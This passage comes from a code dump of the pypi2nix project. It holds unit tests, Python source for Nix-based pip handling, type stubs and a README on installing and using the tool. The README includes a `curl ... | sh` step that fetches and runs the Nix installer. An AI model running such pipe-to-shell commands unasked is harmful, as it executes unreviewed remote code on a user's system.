requirement = requirement_parser.parse(\"path/to/requirement#egg=test-req\")\n assert isinstance(requirement, PathRequirement)\n requirement = requirement.change_path(lambda p: os.path.join(\"changed\", p))\n assert requirement.path() == \"changed/path/to/requirement\"\n\n\ndef test_that_we_can_add_url_requirements_where_one_does_not_apply(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://test.test#egg=test-req\")\n req2 = requirement_parser.parse(\n 'https://other.test#egg=test-req; python_version == \"1.0\"'\n )\n assert req1.add(req2, current_platform) == req1\n assert req2.add(req1, current_platform) == req1\n\n\ndef test_cannot_add_url_requirements_with_different_names(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://test.test#egg=req1\")\n req2 = requirement_parser.parse(\"https://test.test#egg=req2\")\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_can_handle_requirements_with_python_full_version_marker(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"req; python_full_version == '{}'\".format(current_platform.python_full_version)\n )\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_rejects_requirements_with_wrong_python_full_version_for_platform(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"req; python_full_version == '{}'\".format(\"1.0.0\")\n )\n assert not requirement.applies_to_target(current_platform)\n\n\ndef test_that_requirements_with_proper_os_name_applies_to_target(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"req; os_name == '{}'\".format(current_platform.os_name)\n )\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_that_extras_of_path_requirements_are_preserved(requirement_parser):\n requirement = requirement_parser.parse(\"/path/to/egg#egg=egg[extra1,extra2]\")\n assert isinstance(requirement, PathRequirement)\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n requirement = requirement_parser.parse(requirement.to_line())\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n\n\ndef test_that_extras_of_url_requirements_are_preserved(requirement_parser):\n requirement = requirement_parser.parse(\n \"https://test.test/test.zip#egg=egg[extra1,extra2]\"\n )\n assert isinstance(requirement, UrlRequirement)\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n requirement = requirement_parser.parse(requirement.to_line())\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n\n\ndef test_that_source_of_url_requirement_with_file_scheme_is_path_source(\n requirement_parser,\n):\n requirement = requirement_parser.parse(\"file://test/path#egg=egg\")\n assert isinstance(requirement.source(), PathSource)\n" }, { "alpha_fraction": 0.7472316026687622, "alphanum_fraction": 0.7498796582221985, "avg_line_length": 28.884891510009766, "blob_id": "331e08a5a466119d6b4b98a84f1282bfcbdba1c4", "content_id": "92cd31ee33d21324de4d27f544b2c26e3c754402", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4154, "license_type": "permissive", "max_line_length": 87, "num_lines": 139, "path": "/unittests/test_source_distribution.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\n\nimport pytest\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package.exceptions import DistributionNotDetected\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.source_distribution import SourceDistribution\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .logger import get_logger_output\nfrom .switches import nix\n\n\n@pytest.fixture\ndef source_distribution(\n six_source_distribution_archive,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n return SourceDistribution.from_archive(\n six_source_distribution_archive, logger, requirement_parser=requirement_parser\n )\n\n\n@pytest.fixture\ndef flit_distribution(\n data_directory, logger: Logger, requirement_parser: RequirementParser\n):\n archive = Archive(os.path.join(data_directory, \"flit-1.3.tar.gz\"))\n return SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser\n )\n\n\n@nix\ndef test_from_archive_picks_up_on_name(source_distribution):\n assert source_distribution.name == \"six\"\n\n\n@nix\ndef test_that_a_source_distributions_name_is_canonicalized(\n logger: Logger, requirement_parser: RequirementParser\n):\n distribution = SourceDistribution(\n name=\"NaMe_teSt\", logger=logger, requirement_parser=requirement_parser\n )\n assert distribution.name == \"name-test\"\n\n\n@nix\ndef test_six_package_has_no_pyproject_toml(source_distribution):\n assert source_distribution.pyproject_toml is None\n\n\n@nix\ndef test_that_flit_pyproject_toml_is_recognized(flit_distribution):\n assert flit_distribution.pyproject_toml is not None\n\n\n@nix\ndef test_that_flit_build_dependencies_contains_requests(\n flit_distribution: SourceDistribution, current_platform: TargetPlatform\n):\n assert \"requests\" in flit_distribution.build_dependencies(current_platform)\n\n\n@nix\ndef test_that_we_can_generate_objects_from_source_archives(\n source_distribution_archive, logger: Logger, requirement_parser: RequirementParser,\n):\n SourceDistribution.from_archive(\n source_distribution_archive, logger, requirement_parser=requirement_parser\n )\n\n\n@nix\ndef test_that_we_can_detect_setup_requirements_for_setup_cfg_projects(\n distribution_archive_for_jsonschema,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n distribution = SourceDistribution.from_archive(\n distribution_archive_for_jsonschema,\n logger,\n requirement_parser=requirement_parser,\n )\n assert \"setuptools-scm\" in distribution.build_dependencies(current_platform)\n\n\ndef test_that_trying_to_create_source_distribution_from_random_zip_throws(\n test_zip_path, logger: Logger, requirement_parser: RequirementParser\n):\n archive = Archive(path=test_zip_path)\n with pytest.raises(DistributionNotDetected):\n SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser,\n )\n\n\ndef test_build_dependencies_for_invalid_deps_logs_warning(\n data_directory,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n spacy_distribution_path = os.path.join(data_directory, \"spacy-2.1.0.tar.gz\")\n archive = Archive(spacy_distribution_path)\n\n dist = SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser\n )\n\n assert \"WARNING:\" not in get_logger_output(logger)\n dist.build_dependencies(current_platform)\n assert \"WARNING:\" in get_logger_output(logger)\n\n\ndef test_invalid_build_dependencies_for_setupcfg_package_logs_warning(\n data_directory,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n distribution_path = os.path.join(\n data_directory, \"setupcfg-package\", \"setupcfg-package.tar.gz\"\n )\n archive = Archive(distribution_path)\n\n dist = SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser\n )\n\n assert \"WARNING:\" not in get_logger_output(logger)\n dist.build_dependencies(current_platform)\n assert \"WARNING:\" in get_logger_output(logger)\n" }, { "alpha_fraction": 0.660611093044281, "alphanum_fraction": 0.6614368557929993, "avg_line_length": 30.05128288269043, "blob_id": "7f380065ccc77b67924a257f7f279fd98eca89c7", "content_id": "425721778753f8f691d93142ccb80a64530dbb36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1211, "license_type": "no_license", "max_line_length": 82, "num_lines": 39, "path": "/src/pypi2nix/environment_marker.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import List\n\nfrom attr import attrib\nfrom attr import attrs\nfrom packaging.markers import InvalidMarker\nfrom packaging.markers import Marker\nfrom packaging.markers import UndefinedComparison\nfrom packaging.markers import UndefinedEnvironmentName\n\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass MarkerEvaluationFailed(Exception):\n pass\n\n\n@attrs\nclass EnvironmentMarker:\n _marker_string: str = attrib()\n\n def applies_to_platform(\n self, target_platform: TargetPlatform, extras: List[str] = []\n ) -> bool:\n def _applies_to_platform_with_extra(extra: str) -> bool:\n environment = target_platform.environment_dictionary()\n environment[\"extra\"] = extra\n try:\n return Marker(self._marker_string).evaluate(environment)\n except (InvalidMarker, UndefinedComparison, UndefinedEnvironmentName):\n raise MarkerEvaluationFailed(\n f\"Failed to evaluate marker {self._marker_string}\"\n )\n\n if not extras:\n extras = [\"\"]\n for extra in extras:\n if _applies_to_platform_with_extra(extra):\n return True\n return False\n" }, { "alpha_fraction": 0.6352459192276001, "alphanum_fraction": 0.6409835815429688, "avg_line_length": 26.727272033691406, "blob_id": "19f0ededb3df39a15c996679ab67c312a460be14", "content_id": "c6435fecb87696b681e05d78649ec90c9987ba77", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1220, "license_type": "permissive", "max_line_length": 67, "num_lines": 44, "path": "/unittests/pip/conftest.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport venv\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import NixPip\nfrom pypi2nix.pip import VirtualenvPip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@pytest.fixture(params=(\"nix\", \"venv\"))\ndef pip(\n request,\n nix: Nix,\n project_dir: str,\n current_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n if request.param == \"nix\":\n return NixPip(\n nix=nix,\n project_directory=Path(project_dir),\n extra_build_inputs=[],\n extra_env=\"\",\n wheels_cache=[],\n target_platform=current_platform,\n logger=logger,\n requirement_parser=requirement_parser,\n )\n else:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"venv-pip\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28, "blob_id": "8e89fe43d6db4001cad81ae137716b55e38d5149", "content_id": "0aafb32b99d65bc709f706700347cb8fb79e0b90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 76, "num_lines": 6, "path": "/mypy/setuptools/config.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\nfrom typing import Dict\n\ndef read_configuration(\n filepath: str, find_others: bool = ..., ignore_option_errors: bool = ...\n) -> Dict[str, Any]: ...\n" }, { "alpha_fraction": 0.6757990717887878, "alphanum_fraction": 0.6757990717887878, "avg_line_length": 20.899999618530273, "blob_id": "740010454df9499eb221ec72290712eea675c0a6", "content_id": "33eef5473392afca474a18221e9a979a1c032ccf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 61, "num_lines": 10, "path": "/mypy/packaging/version.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Union\n\nclass InvalidVersion(ValueError): ...\n\nclass Version:\n def __init__(self, version: str) -> None: ...\n\nclass LegacyVersion: ...\n\ndef parse(version: str) -> Union[Version, LegacyVersion]: ...\n" }, { "alpha_fraction": 0.5755338668823242, "alphanum_fraction": 0.577464759349823, "avg_line_length": 33.79841995239258, "blob_id": "4005a8718bbde1beb1063d0a88e84f046a0ba32f", "content_id": "f40453a0faa44a41e2a8410187126c2022637ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8804, "license_type": "no_license", "max_line_length": 93, "num_lines": 253, "path": "/src/pypi2nix/pip/implementation.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport shlex\nimport shutil\nimport sys\nimport urllib.parse\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport click\n\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix import EvaluationFailed\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.path import Path\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.utils import NixOption\nfrom pypi2nix.utils import escape_double_quotes\n\nfrom .interface import Pip\n\nHERE = os.path.dirname(__file__)\nDOWNLOAD_NIX = os.path.join(HERE, \"download.nix\")\nWHEEL_NIX = os.path.join(HERE, \"wheel.nix\")\nINSTALL_NIX = os.path.join(HERE, \"install.nix\")\nBASE_NIX = os.path.join(HERE, \"base.nix\")\n\n\nclass NixPip(Pip):\n def __init__(\n self,\n nix: Nix,\n project_directory: Path,\n extra_build_inputs: List[ExternalDependency],\n extra_env: str,\n wheels_cache: List[str],\n target_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n ):\n self.nix = nix\n self.project_directory = project_directory\n self.extra_build_inputs = extra_build_inputs\n self.extra_env = extra_env\n self.build_output: str = \"\"\n self.wheels_cache = wheels_cache\n self.target_platform = target_platform\n self.logger = logger\n self.requirement_parser = requirement_parser\n\n output = self.nix.evaluate_expression(\n 'let pkgs = import <nixpkgs> {}; in \"%s\"' % escape_double_quotes(extra_env)\n )\n # trim quotes\n self.extra_env = output[1:-1]\n\n self.default_lib_directory = self.project_directory / \"lib\"\n self.download_cache_directory = self.project_directory / \"cache\"\n\n def download_sources(\n self, requirements: RequirementSet, target_directory: Path\n ) -> None:\n if not requirements:\n return\n requirements_files = [\n requirements.to_file(\n str(self.project_directory),\n self.target_platform,\n self.requirement_parser,\n self.logger,\n ).processed_requirements_file_path()\n ]\n self.build_from_nix_file(\n command=\"exit\",\n file_path=DOWNLOAD_NIX,\n nix_arguments=self.nix_arguments(\n requirements_files=requirements_files,\n destination_directory=target_directory,\n editable_sources_directory=self.editable_sources_directory(),\n build_directory=self.build_directory(),\n ),\n )\n\n def build_wheels(\n self,\n requirements: RequirementSet,\n target_directory: Path,\n source_directories: List[Path],\n ) -> None:\n if not requirements:\n return\n requirements_files = [\n requirements.to_file(\n str(self.project_directory),\n self.target_platform,\n self.requirement_parser,\n self.logger,\n ).processed_requirements_file_path()\n ]\n self.build_from_nix_file(\n command=\"exit\",\n file_path=WHEEL_NIX,\n nix_arguments=self.nix_arguments(\n wheels_cache=self.wheels_cache,\n requirements_files=requirements_files,\n editable_sources_directory=self.editable_sources_directory(),\n build_directory=self.build_directory(),\n wheels_dir=target_directory,\n sources=source_directories,\n ),\n )\n\n def install(\n self,\n requirements: RequirementSet,\n source_directories: List[Path],\n target_directory: Optional[Path] = None,\n ) -> None:\n if not requirements:\n return\n if target_directory is None:\n target_directory = self.default_lib_directory\n requirements_files = [\n requirements.to_file(\n str(self.project_directory),\n self.target_platform,\n self.requirement_parser,\n self.logger,\n ).processed_requirements_file_path()\n ]\n self.build_from_nix_file(\n command=\"exit\",\n file_path=INSTALL_NIX,\n nix_arguments=self.nix_arguments(\n requirements_files=requirements_files,\n target_directory=target_directory,\n sources_directories=source_directories,\n ),\n )\n\n def freeze(self, python_path: List[Path] = []) -> str:\n additional_paths = \":\".join(shlex.quote(str(path)) for path in python_path)\n\n output: str = self.nix.shell(\n \"{PYTHONPATH} pip freeze\".format(\n PYTHONPATH=\"PYTHONPATH=\" + additional_paths + ':\"$PYTHONPATH\"'\n if python_path\n else \"\"\n ),\n BASE_NIX,\n nix_arguments=self.nix_arguments(),\n )\n lines = map(lambda x: x.strip(), output.splitlines())\n return (\"\\n\".join(lines) + \"\\n\") if lines else \"\"\n\n def editable_sources_directory(self) -> Path:\n return self.project_directory / \"editable_sources\"\n\n def build_directory(self) -> Path:\n return self.project_directory / \"build\"\n\n def nix_arguments(self, **arguments: NixOption) -> Dict[str, NixOption]:\n return dict(\n dict(\n download_cache_dir=str(self.download_cache_directory),\n extra_build_inputs=[\n input.attribute_name() for input in self.extra_build_inputs\n ],\n project_dir=str(self.project_directory),\n python_version=self.target_platform.nixpkgs_python_version.derivation_name(),\n extra_env=self.extra_env,\n ),\n **arguments,\n )\n\n def build_from_nix_file(\n self, file_path: str, command: str, nix_arguments: Any\n ) -> None:\n self.create_download_cache_if_missing()\n self.delete_build_directory()\n try:\n self.build_output = self.nix.shell(\n command=command, derivation_path=file_path, nix_arguments=nix_arguments\n )\n except EvaluationFailed as error:\n if error.output is not None:\n self.build_output += error.output\n is_failure = True\n else:\n is_failure = False\n self.handle_build_error(is_failure=is_failure)\n\n def create_download_cache_if_missing(self) -> None:\n self.download_cache_directory.ensure_directory()\n\n def delete_build_directory(self) -> None:\n try:\n shutil.rmtree(str(self.build_directory()))\n except FileNotFoundError:\n pass\n\n def handle_build_error(self, is_failure: bool) -> None:\n if not is_failure:\n if not self.build_output.endswith(\n \"ERROR: Failed to build one or more wheels\"\n ):\n return\n\n self.logger.error(self.build_output)\n\n message = \"While trying to run the command something went wrong.\"\n\n # trying to recognize the problem and provide more meanigful error\n # message\n no_matching_dist = \"No matching distribution found for \"\n if no_matching_dist in self.build_output:\n dist_name = self.build_output[\n self.build_output.find(no_matching_dist) + len(no_matching_dist) :\n ]\n dist_name = dist_name[: dist_name.find(\" (from\")]\n message = (\n \"Most likely `%s` package does not have source (zip/tar.bz) \"\n \"distribution.\" % dist_name\n )\n\n else:\n try:\n self.send_crash_report()\n except OSError:\n self.logger.error(\"Failed to send crash report\")\n\n raise click.ClickException(message)\n\n def send_crash_report(self) -> None:\n if click.confirm(\n \"Do you want to report above issue (a browser \"\n \"will open with prefilled details of issue)?\"\n ):\n title = \"Error when running pypi2nix command\"\n body = \"# Description\\n\\n<detailed description of error \"\n \"here>\\n\\n\"\n body += \"# Traceback \\n\\n```bash\\n\"\n body += \"% pypi2nix --version\\n\"\n body += \"% pypi2nix \" + \" \".join(sys.argv[1:]) + \"\\n\"\n body += self.build_output + \"\\n```\\n\"\n click.launch(\n \"https://github.com/nix-community/pypi2nix/issues/new?%s\"\n % (urllib.parse.urlencode(dict(title=title, body=body)))\n )\n" }, { "alpha_fraction": 0.6240947842597961, "alphanum_fraction": 0.6240947842597961, "avg_line_length": 25.189655303955078, "blob_id": "bc402778da96498fb632fd10f73579843bb8a3b6", "content_id": "14e6244712eb7da45604ec2282dc401c0656a25c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1519, "license_type": "no_license", "max_line_length": 86, "num_lines": 58, "path": "/src/pypi2nix/project_directory.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import tempfile\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom sys import stderr\nfrom types import TracebackType\nfrom typing import Optional\nfrom typing import Type\n\n\nclass ProjectDirectory(metaclass=ABCMeta):\n @abstractmethod\n def __enter__(self) -> str:\n pass\n\n @abstractmethod\n def __exit__(\n self,\n exc_type: Optional[Type],\n exc_value: Optional[Exception],\n traceback: Optional[TracebackType],\n ) -> None:\n pass\n\n\nclass TemporaryProjectDirectory(ProjectDirectory):\n def __init__(self) -> None:\n self.temporary_directory = tempfile.TemporaryDirectory()\n\n def __enter__(self) -> str:\n return self.temporary_directory.__enter__()\n\n def __exit__(\n self,\n exc_type: Optional[Type],\n exc_value: Optional[Exception],\n traceback: Optional[TracebackType],\n ) -> None:\n return self.temporary_directory.__exit__(exc_type, exc_value, traceback)\n\n\nclass PersistentProjectDirectory(ProjectDirectory):\n def __init__(self, path: str) -> None:\n self.path = path\n\n def __enter__(self) -> str:\n print(\n \"WARNING: You have specified the `--build-directory OPTION`.\", file=stderr\n )\n print(\"WARNING: It is recommended to not use this flag.\", file=stderr)\n return self.path\n\n def __exit__(\n self,\n exc_type: Optional[Type],\n exc_value: Optional[Exception],\n traceback: Optional[TracebackType],\n ) -> None:\n pass\n" }, { "alpha_fraction": 0.6816552877426147, "alphanum_fraction": 0.6890532970428467, "avg_line_length": 33.8128776550293, "blob_id": "368941d30e45d019f20ae3091c3b65648338055d", "content_id": "4a85893a4224bca2ebae5a4f3e275e1dd421f7ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 17302, "license_type": "no_license", "max_line_length": 114, "num_lines": 497, "path": "/README.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "pypi2nix - generate Nix expressions for Python packages\n=======================================================\n\n.. contents::\n\nSee https://pypi2nix.readthedocs.io/en/latest/ for documentation.\n\n.. inclusion-marker\n\n``pypi2nix`` is a command line tool that generates `Nix expressions`_ from\ndifferent ``requirements.txt``. This is useful for:\n\n- Building a Nix derivation for a program written in Python as part of\n packaging it.\n\n- Setting up a development environment to hack on a program written in Python.\n\n The only way we can fix bugs with pypi2nix is if you report them. Please\n create an issue if you discover problems.\n\n``pypi2nix`` will (until further notice) only work with latest *unstable*\nchannel. This is due to ongoing changes in Python infrastructure happening in\nNixpkgs.\n\nThe `Nixpkgs manual section about Python\n<https://nixos.org/nixpkgs/manual/#python>`_ makes good reading if you\nhaven't seen it already.\n\n1. Installation\n---------------\n\n``pypi2nix`` is part of ``nixpkgs``. If you just want to use\n``pypi2nix`` on your system, it is recommended that you install it via\nthe regular means, e.g. ``nix-env -iA nixos.pypi2nix`` on NixOS or\n``nix-env -iA nixpkgs.pypi2nix`` on other systems utilizing nix.\n\nSystem Requirements\n^^^^^^^^^^^^^^^^^^^\n\nMake sure Nix is installed::\n\n % curl https://nixos.org/nix/install | sh\n\nCurrently ``pypi2nix`` is only tested against ``linux`` systems.\nSupported ``nixpkgs`` channels are ``nixos-19.09`` and\n``nixos-unstable``. Due to the nature of ``nixos-unstable`` the\noccasional breakage of ``pypi2nix`` is to be expected. We try to\nprovide fixes in that regard in a timely manner.\n\n\nAd hoc Installation (Simple)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nFor just installing the package with a command, use `nix-env`_::\n\n nix-env -if https://github.com/nix-community/pypi2nix/tarball/master\n\nDeclarative Installation (Advanced)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nIf you prefer to explicitly declare each installed package in your\nNix(OS) or project configuration, you can do the following:\n\nFirst, import the package from its ``default.nix`` by fetching the\nwhole git repository with ``pkgs.fetchgit``. Afterwards you can just\nadd the imported attribute the list of installed software.\n\nBelow you find an example for NixOS' ``configuration.nix``. Other\nmethods like `home-manager`_ work similar::\n\n let\n pypi2nix = import (pkgs.fetchgit {\n url = \"https://github.com/nix-community/pypi2nix\";\n # adjust rev and sha256 to desired version\n rev = \"v2.0.1\";\n sha256 = \"sha256:0mxh3x8bck3axdfi9vh9mz1m3zvmzqkcgy6gxp8f9hhs6qg5146y\";\n }) {};\n in\n environment.systemPackages = [\n # your other packages\n pypi2nix\n ];\n\n\n\n2. Usage\n--------\n\nThe easiest way to generate a Nix expressions is to invoke::\n\n % pypi2nix -e packageA -e packageB==0.1\n\nIf you also have a ``requirements.txt`` file for your Python project you can use\nthe ``-r`` option.\n\n::\n\n % pypi2nix -e packageA -e packageB==0.1 \\\n -r requirements.txt -r requirements-dev.txt\n\n\nWhat is being generated\n^^^^^^^^^^^^^^^^^^^^^^^\n\nOption ``-V`` tells pypi2nix which python version to be used. To see which\nPython versions are available consult ``pypi2nix --help``.\n\nOnce Nix expressions are generated you should be able to see 3 new files:\n\n- ``requirements_frozen.txt`` - full frozen set for your for your pypi2nix call.\n This is the output you would expect from ``pip freeze``.\n\n- ``requirements.nix`` is a file which contains a nix expression to for the package set that was built.\n\n- ``requirements_override.nix`` - this is an empty file which lets you\n override generated nix expressions.\n\n\nBuilding generated packages\n^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nBuild one package::\n\n % nix build -f requirements.nix packages.empy\n\nBuild all packages::\n\n % nix build -f requirements.nix packages\n\nBuild python interpreter with all packages loaded::\n\n % nix build -f requirements.nix interpreter\n % ./result/bin/python -c \"import empy\"\n\nEnter development environment::\n\n % nix run -f requirements.nix interpreter\n [user@localhost:~/dev/nixos/pypi2nix) % python -c \"import empy\"\n\n\nUsing generated packages\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nIf you are working on a project where its dependencies are defined in\n``requirements.txt`` then you can create a ``default.nix`` and add generated\npackages as ``buildInputs``, as demonstrated here::\n\n {}:\n let\n python = import ./requirements.nix { inherit pkgs; };\n in python.mkDerivation {\n name = \"ProjectA-1.0.0\";\n src = ./.;\n buildInputs = [\n python.packages.\"coverage\"\n python.packages.\"flake8\"\n python.packages.\"mock\"\n python.packages.\"pytest\"\n python.packages.\"pytest-asyncio\"\n python.packages.\"pytest-cov\"\n python.packages.\"pytest-mock\"\n python.packages.\"pytest-xdist\"\n python.packages.\"virtualenv\"\n ];\n propagatedBuildInputs = [\n python.packages.\"aiohttp\"\n python.packages.\"arrow\"\n python.packages.\"defusedxml\"\n python.packages.\"frozendict\"\n python.packages.\"jsonschema\"\n python.packages.\"taskcluster\"\n python.packages.\"virtualenv\"\n ];\n ...\n }\n\n\nAs you can see you can access all packages via ``python.packages.\"<name>\"``. If\nyou want to depend on *all* packages you can even do::\n\n\n propagatedBuildInputs = builtins.attrValues python.packages;\n\nCommand line options\n^^^^^^^^^^^^^^^^^^^^\n\n``-v``\n Increase amount and detail of information output to the user.\n Verbosity levels are ``ERROR``, ``WARNING``, ``INFO`` and\n ``DEBUG`` in that order. The default verbosity is ``INFO``.\n\n``-q``\n Reduce amount and detail of information output to the user. See\n ``-v`` for more information.\n\n``-I/--nix-path TEXT``\n Add entries to the ``NIX_PATH`` environment variable similarly to\n how ``-I`` works with ``nix`` executables like ``nix-build``.\n This can be useful for generating package sets based on a\n different ``nixpkgs`` version than the one used one the local\n system.\n\n``--nix-shell PATH``\n Path to an alternative version of the ``nix-shell`` command. The\n default is the first executable that will be found in the current\n ``PATH`` of the system.\n\n``--version``\n Show the current version of ``pypi2nix``\n\n``--basename TEXT``\n This option determins the name the produced files. So with\n ``--basename environment`` you would get the files\n ``environment.nix``, ``environment_frozen.nix`` and\n ``environment_override.nix``.\n\n``--extra-build-inputs/-E TEXT``\n Extra build inputs that the required python packages need to run,\n e.g. ``libffi`` or ``libgl``. In that case you would provide ``-E\n \"libffi libgl\"``. These nix packages will be available in the\n build environment for the wheels.\n\n``--emit-extra-build-inputs/--no-emit-extra-build-inputs``\n These options let you control if external build dependencies\n specified via ``-E`` will end up in the generated nix package set.\n Please note that if you select this option, your overrides need to\n make sure that python packages find their respective external\n dependencies.\n\n``--extra-env/-N TEXT``\n Extra environment variables that will be passed to the build\n environment. Note that you can use nix expressions in this\n string, e.g. ``-N 'BERKELEYDB_DIR=${pkgs.db.dev}'``.\n\n``--enable-tests/-T``\n Specify this flag if you want to enable the check phase of all\n packages in the generated nix expression. Please note that this\n feature is highly exprimental and will probably not work for your\n use case.\n\n``--python-version/-V``\n Specify the python version you want the requirement set to be\n built with. The default is ``3`` which translates to the\n ``python3`` derivation of ``nixpkgs``.\n\n``--requirements/-r FILE``\n Specify a requirements file, similar as you would with ``pip``.\n ``pypi2nix`` tries to be fully compatible with the file format of\n ``pip``.\n\n``--editable/-e TEXT``\n This option allows you to specify individual requirements that get\n added to the requirement set, e.g. ``pypi2nix -e attrs``,\n ``pypi2nix -e $HOME/src/myproject#egg=myproject`` or ``pypi2nix -e .#egg=myegg``.\n\n``--setup-requires/-s TEXT``\n Allows you to specify python packages that need to be present in\n the build environment of other packages, a good example of this\n would be ``setuptools-scm``. Note that ``pypi2nix`` tries to\n detect these dependencies on its own. You only need to specify\n this flag in cases where a package author or maintainer forgot to\n mention build time dependencies in their setup or neither\n ``setup.cfg`` nor ``pyproject.toml`` is used.\n\n``--overrides/-O URL``\n Allows you to specify additional overrides that conform to the\n general structure of ``requirements_override.nix``. We support\n regular URLs with ``http`` and ``https`` scheme and also ``git``.\n An example for using ``https`` would be ``pypi2nix -O\n https://myoverrides.test/overrides.nix``. Reusing an overlay from\n a git repository would be done like so: ``pypi2nix -O\n git+https://github.com/nix-community/pypi2nix.git&path=requirement_override.nix``.\n Please keep in mind that these overrides are incorporated in a nix\n expression with a precalculated hash value. So if the file\n changes upstream your generated package can not be built anymore.\n\n``--default-overrides/--no-default-overrides``\n Pull in overrides from\n ``https://github.com/nix-community/pypi2nix-overrides``. This\n feature is enabled by default.\n\n``--wheels-cache/-W TEXT``\n A location where prebuilt wheels can be found. This option will\n ultimately be passed to ``pip --find-links``. Only point to\n wheels that are built through ``pypi2nix`` on your own or a very\n similar system.\n\n``--build-directory TEXT``\n **Warning** A bug in ``pypi2nix`` currently prevents some packages\n from being built with this option set. It is recommended to not\n use this flag.\n\n The directory where pypi2nix would build the python environment to\n generate the desired nix expression. If not specified, the build\n directory will be temporary and is deleted before the program\n exits.\n\n``--dependency-graph-output PATH``\n Output the dependency information of processed packages to the\n specified path. The output format is yaml.\n\n\n3. When it doesn't work\n-----------------------\n\nI hope nobody is expecting ``pypi2nix`` to do always a perfect job. In Python\npackaging, there are just too many different cases that we will never be able to\ncover. What ``pypi2nix`` tries to do is to get you very close.\n\nSometimes ``pypi2nix`` fails entirely. If this happens, open a bug --\nit's almost always a bug in ``pypi2nix``. However, sometimes\n``pypi2nix`` succeeds but the resulting ``requirements.nix`` file\nfails during the building of your Python package. Depending on what\nthe problem is, this section may be helpful.\n\nNon-Python/system dependencies\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nQuite a few Python packages require non-Python dependencies to be\npresent at build time. These packages will fail to build with error\nmessages about not being able to find ``foo.h`` or some ``fooconfig``\nfile. To work around this, ``pypi2nix`` has ``-E`` options which can\nbe used to include extra non-Python dependencies.\n\nFor example, ``psycopg2`` requires ``pg_config`` binary to be present at installation time::\n\n % pypi2nix -v -V 2.7 -e psycopg2 -E postgresql\n\n``lxml`` requires ``libxml2`` and ``libxslt`` system package::\n\n % pypi2nix -v -V 2.7 -e lxml -E libxml2 -E libxslt\n\n\nAdditional environment variables\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSome packages expect additional environment variables to be set::\n\n % pypi2nix -v -V 2.7 -e bsddb3 -N 